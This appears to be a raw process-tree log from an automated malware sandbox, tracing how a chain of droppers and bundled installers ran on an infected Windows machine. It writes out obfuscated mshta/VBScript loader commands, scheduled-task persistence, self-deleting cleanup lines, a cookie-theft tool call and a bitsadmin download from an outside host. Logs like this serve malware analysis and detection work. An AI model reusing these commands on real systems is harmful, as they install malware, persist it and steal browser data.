    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5140 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6360 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6228 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5380 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4736 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5484 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5188 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3772 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3740 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3748 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3788 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4052 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5888 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5608 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3388 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5348 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3548 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5188 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=724 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5512 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3620 /prefetch:8
[1] \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s BITS
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[2] C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k SystemNetworkService
    - Drops file in System32 directory
    - Checks processor information in registry
    - Modifies data under HKEY_USERS
    - Modifies registry class

[1] C:\Users\Admin\AppData\Local\Temp\25D.exe
    C:\Users\Admin\AppData\Local\Temp\25D.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry

[2] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im 25D.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\25D.exe" & del C:\ProgramData\*.dll & exit

[3] C:\Windows\SysWOW64\taskkill.exe
    taskkill /im 25D.exe /f
    - Kills process with taskkill

[3] C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    - Delays execution with timeout.exe

[1] C:\Windows\system32\rUNdlL32.eXe
    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    - Process spawned unexpected child process

[2] C:\Windows\SysWOW64\rundll32.exe
    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    - Loads dropped DLL

[1] \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s BITS
    - Modifies data under HKEY_USERS

[1] \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
    - Suspicious use of NtCreateUserProcessOtherParentProcess

[1] C:\Users\Admin\AppData\Local\Temp\335C.exe
    C:\Users\Admin\AppData\Local\Temp\335C.exe
    - Executes dropped EXE

[2] C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Videocard Service" /tr "C:\Users\Admin\AppData\Local\Temp\335C.exe" /f
    - Creates scheduled task(s)

[1] C:\Users\Admin\AppData\Local\Temp\3745.exe
    C:\Users\Admin\AppData\Local\Temp\3745.exe
    - Executes dropped EXE
    - Loads dropped DLL

[1] C:\Users\Admin\AppData\Local\Temp\3C96.exe
    C:\Users\Admin\AppData\Local\Temp\3C96.exe
    - Executes dropped EXE

[1] C:\Users\Admin\AppData\Local\Temp\4590.exe
    C:\Users\Admin\AppData\Local\Temp\4590.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks SCSI registry key(s)

[1] C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe

[1] C:\Windows\explorer.exe
    C:\Windows\explorer.exe

[1] C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe

[1] C:\Windows\explorer.exe
    C:\Windows\explorer.exe
    - Suspicious behavior: MapViewOfSection

[1] C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe

[1] C:\Windows\explorer.exe
    C:\Windows\explorer.exe
    - Suspicious behavior: MapViewOfSection

[1] C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe

[1] C:\Windows\explorer.exe
    C:\Windows\explorer.exe
    - Suspicious behavior: MapViewOfSection

[1] C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe

[1] C:\Users\Admin\AppData\Local\Temp\DFFC.exe
    C:\Users\Admin\AppData\Local\Temp\DFFC.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry

[2] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im DFFC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\DFFC.exe" & del C:\ProgramData\*.dll & exit

[3] C:\Windows\SysWOW64\taskkill.exe
    taskkill /im DFFC.exe /f
    - Kills process with taskkill

[4] C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - Drops file in Drivers directory
    - Adds Run key to start application

[3] C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    - Delays execution with timeout.exe

[1] C:\Users\Admin\AppData\Local\Temp\E3F5.exe
    C:\Users\Admin\AppData\Local\Temp\E3F5.exe
    - Executes dropped EXE

[2] C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VbsCRIPt: Close ( CREATeObjECT( "wsCRIpT.ShElL" ). RUn ( "cmd.exe /Q /c tyPE ""C:\Users\Admin\AppData\Local\Temp\E3F5.exe"" > wiZC_h7~B.eXE &&STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If """" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\E3F5.exe"" ) do taskkill /Im ""%~nxE"" -F " , 0, TRue ) )

[3] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /Q /c tyPE "C:\Users\Admin\AppData\Local\Temp\E3F5.exe" > wiZC_h7~B.eXE &&STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If "" == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\E3F5.exe" ) do taskkill /Im "%~nxE" -F

[4] C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE
    wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t
    - Executes dropped EXE

[5] C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VbsCRIPt: Close ( CREATeObjECT( "wsCRIpT.ShElL" ). RUn ( "cmd.exe /Q /c tyPE ""C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE"" > wiZC_h7~B.eXE &&STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If ""/PgRbPZTUXQ3fqTxJ5RJVzdoK5t "" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE"" ) do taskkill /Im ""%~nxE"" -F " , 0, TRue ) )

[6] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /Q /c tyPE "C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE" > wiZC_h7~B.eXE &&STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If "/PgRbPZTUXQ3fqTxJ5RJVzdoK5t " == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE" ) do taskkill /Im "%~nxE" -F

[5] C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VBScRIpt: clOSE ( CReatEObjecT ("WSCRipt.ShElL"). RUN( "C:\Windows\system32\cmd.exe /q /C eCHO fx46oC:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\Admin\AppData\Local\Microsoft\WindowsApps;g9q> fHUZ28V.I0 & ECho | sET /p = ""MZ"" > PD~PO.Fu& Copy /y /B PD~PO.FU + 7KUTL.Vbk + FDiJ.1V + ShUJ.ChH +fHuZ28V.I0 m9HEkzA.2 & sTArT regsvr32.exe /U -S m9HEkZA.2 " , 0, TrUE) )

[4] C:\Windows\SysWOW64\taskkill.exe
    taskkill /Im "E3F5.exe" -F
    - Kills process with taskkill

[1] C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

[1] \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

[1] C:\Users\Admin\AppData\Local\Temp\4158.exe
    C:\Users\Admin\AppData\Local\Temp\4158.exe

[1] C:\Users\Admin\AppData\Local\Temp\42A1.exe
    C:\Users\Admin\AppData\Local\Temp\42A1.exe

[2] C:\Users\Admin\AppData\Local\Temp\is-R3P30.tmp\42A1.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-R3P30.tmp\42A1.tmp" /SL5="$402A8,172303,88576,C:\Users\Admin\AppData\Local\Temp\42A1.exe"

[3] C:\Users\Admin\AppData\Local\Temp\is-N0TI1.tmp\èeèrgegdè_éçè_)))_.exe
    "C:\Users\Admin\AppData\Local\Temp\is-N0TI1.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=rec7
    - Drops file in Drivers directory
    - Adds Run key to start application

[4] C:\Program Files\Windows NT\TKJVUMTXEA\irecord.exe
    "C:\Program Files\Windows NT\TKJVUMTXEA\irecord.exe" /VERYSILENT

[5] C:\Users\Admin\AppData\Local\Temp\is-Q6TKD.tmp\irecord.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-Q6TKD.tmp\irecord.tmp" /SL5="$B035C,5808768,66560,C:\Program Files\Windows NT\TKJVUMTXEA\irecord.exe" /VERYSILENT
    - Suspicious use of FindShellTrayWindow

[6] C:\Program Files (x86)\i-record\I-Record.exe
    "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu

[4] C:\Users\Admin\AppData\Local\Temp\8e-ad8e8-967-95083-3c1a798362d3c\Xegysukinae.exe
    "C:\Users\Admin\AppData\Local\Temp\8e-ad8e8-967-95083-3c1a798362d3c\Xegysukinae.exe"
    - Checks computer location settings

[4] C:\Users\Admin\AppData\Local\Temp\a4-40e00-788-ce7b7-7b5b1111cd39c\Lojuqalequ.exe
    "C:\Users\Admin\AppData\Local\Temp\a4-40e00-788-ce7b7-7b5b1111cd39c\Lojuqalequ.exe"

[5] C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lb5l3mzl.5wu\GcleanerEU.exe /eufive & exit

[5] C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g4zkmxcg.ok2\JoSetp.exe & exit

[6] C:\Users\Admin\AppData\Local\Temp\g4zkmxcg.ok2\JoSetp.exe
    C:\Users\Admin\AppData\Local\Temp\g4zkmxcg.ok2\JoSetp.exe

[7] C:\Users\Admin\AppData\Roaming\7597109.exe
    "C:\Users\Admin\AppData\Roaming\7597109.exe"

[7] C:\Users\Admin\AppData\Roaming\5145379.exe
    "C:\Users\Admin\AppData\Roaming\5145379.exe"
    - Suspicious behavior: SetClipboardViewer

[7] C:\Users\Admin\AppData\Roaming\6009216.exe
    "C:\Users\Admin\AppData\Roaming\6009216.exe"

[5] C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vyzm0bxm.zkd\installer.exe /qn CAMPAIGN="654" & exit

[5] C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yqyss2ce.da2\Setup3310.exe /Verysilent /subid=623 & exit

[6] C:\Users\Admin\AppData\Local\Temp\yqyss2ce.da2\Setup3310.exe
    C:\Users\Admin\AppData\Local\Temp\yqyss2ce.da2\Setup3310.exe /Verysilent /subid=623

[7] C:\Users\Admin\AppData\Local\Temp\is-T7PVC.tmp\Setup3310.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-T7PVC.tmp\Setup3310.tmp" /SL5="$10474,138429,56832,C:\Users\Admin\AppData\Local\Temp\yqyss2ce.da2\Setup3310.exe" /Verysilent /subid=623
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-5RQPJ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-5RQPJ.tmp\Setup.exe" /Verysilent8⤵
-
C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SMTP2.tmp\MediaBurner.tmp"C:\Users\Admin\AppData\Local\Temp\is-SMTP2.tmp\MediaBurner.tmp" /SL5="$3050A,303887,220160,C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QNCOS.tmp\_____________bob.exe"C:\Users\Admin\AppData\Local\Temp\is-QNCOS.tmp\_____________bob.exe" /S /UID=burnerch111⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
C:\Program Files\Windows Security\ZVIOSTQMHV\ultramediaburner.exe"C:\Program Files\Windows Security\ZVIOSTQMHV\ultramediaburner.exe" /VERYSILENT12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CPU77.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-CPU77.tmp\ultramediaburner.tmp" /SL5="$30584,281924,62464,C:\Program Files\Windows Security\ZVIOSTQMHV\ultramediaburner.exe" /VERYSILENT13⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu14⤵
-
C:\Users\Admin\AppData\Local\Temp\96-cdcd3-65f-70b91-bf69ee21f36d9\Fikumigaena.exe"C:\Users\Admin\AppData\Local\Temp\96-cdcd3-65f-70b91-bf69ee21f36d9\Fikumigaena.exe"12⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\68-8b475-f52-2e1b1-5c4e2571c1280\Qomikaekuqy.exe"C:\Users\Admin\AppData\Local\Temp\68-8b475-f52-2e1b1-5c4e2571c1280\Qomikaekuqy.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\obhd0sxq.uj5\GcleanerEU.exe /eufive & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3isgf5zv.5q2\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0abmzj35.vpe\Setup3310.exe /Verysilent /subid=623 & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\0abmzj35.vpe\Setup3310.exeC:\Users\Admin\AppData\Local\Temp\0abmzj35.vpe\Setup3310.exe /Verysilent /subid=62314⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8USGP.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-8USGP.tmp\Setup3310.tmp" /SL5="$30440,138429,56832,C:\Users\Admin\AppData\Local\Temp\0abmzj35.vpe\Setup3310.exe" /Verysilent /subid=62315⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-74D8F.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-74D8F.tmp\Setup.exe" /Verysilent16⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exeC:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe"C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe" -a15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exe14⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exe15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\14s4xsrx.0yo\SunLabsPlayer.exe /S & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\14s4xsrx.0yo\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\14s4xsrx.0yo\SunLabsPlayer.exe /S14⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx15⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx16⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
